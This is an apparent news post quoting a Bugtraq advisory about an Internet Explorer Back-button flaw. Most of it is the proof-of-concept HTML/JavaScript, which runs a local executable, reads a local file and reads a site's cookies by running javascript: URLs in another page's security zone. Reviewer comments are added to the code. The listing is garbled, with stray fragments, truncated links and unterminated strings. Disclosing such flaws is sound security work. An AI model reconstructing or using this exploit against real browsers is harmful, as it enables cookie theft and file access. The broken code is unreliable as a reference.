Don't Hit That Back Button
Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When the back button is pressed, javascript: links are executed in the security zone of the last URL viewed. The proof-of-concept included in the warning launches Minesweeper or reads your Google cookies."
<html>m 32/winmine.exe')">t em32/winmine.exe')">& gt;m / )">
// Use if not XP1 ';' )";
<!-- Trigger links for the quoted proof-of-concept. Each href is a javascript: URL that
     calls one of the functions in the script block below; several href attributes are cut
     off mid-string in this listing, so the markup as shown is not well-formed. -->
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/syste
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/sys
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.co
Read Google cookie</a>
<script>
// Implicit global (no var) used by execFile and readFile as the first argument to
// backBug, i.e. the page the script navigates to before the payload is written.
// The commented-out alternative is a domain that does not resolve; the live value is
// a bare "res:" URL with no path.
// badUrl = "http://www.nonexistingdomain.se";
badUrl = "res:";
// Builds an <object> payload whose CODEBASE is the given file URL and hands it to
// backBug together with badUrl. This is the "launch Minesweeper" case from the summary:
// the two Minesweeper links above call it with a local winmine.exe path.
// NOTE(review): the classid string on the next line is cut off in this listing (the
// quote is never closed), so this function is not runnable as shown.
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-11111111111
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
// Builds a hidden <iframe> payload that loads the given file URL and, on load, alerts
// the frame's body text; then hands it to backBug together with badUrl. This is the
// "Read c:\test.txt" case from the links above.
// NOTE(review): "</iframe&g t;" looks like a garbled "&gt;" from the mailing-list
// extraction, not the author's intent; it is left as-is here.
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe&g t;';
backBug(badUrl,s);
}
// Builds a <script> payload that alerts document.cookie and closes the window, then
// hands it to backBug. Unlike execFile/readFile, the navigation target here is the
// caller-supplied url (the Google URL in the link above) rather than badUrl — this is
// the summary's point that the javascript: link runs in the security zone of the last
// URL viewed, so the cookie read is that site's cookie.
// NOTE(review): the closing tag `< "+"/script>` is mis-quoted in this listing (a `"+"`
// inside a single-quoted string); it was presumably '<'+'/script>' in the original.
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
// Core of the proof-of-concept. Records the current history length and location, then
// assigns `location` a javascript: URL that behaves in two ways depending on whether
// history.length has changed when it is (re-)evaluated:
//   - changed (i.e. after the user presses Back): open a window that document.write()s
//     the payload, then call history.back();
//   - unchanged (first evaluation): evaluate to a string containing a <script> that sets
//     location to `url` and document.title to the recorded page.
// The summary describes the browser behaviour this relies on; the code itself only shows
// the two branches above.
// NOTE(review): lines building the open(...) call and the else branch are cut off in this
// listing (unterminated string literals), so the function is not runnable as shown.
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>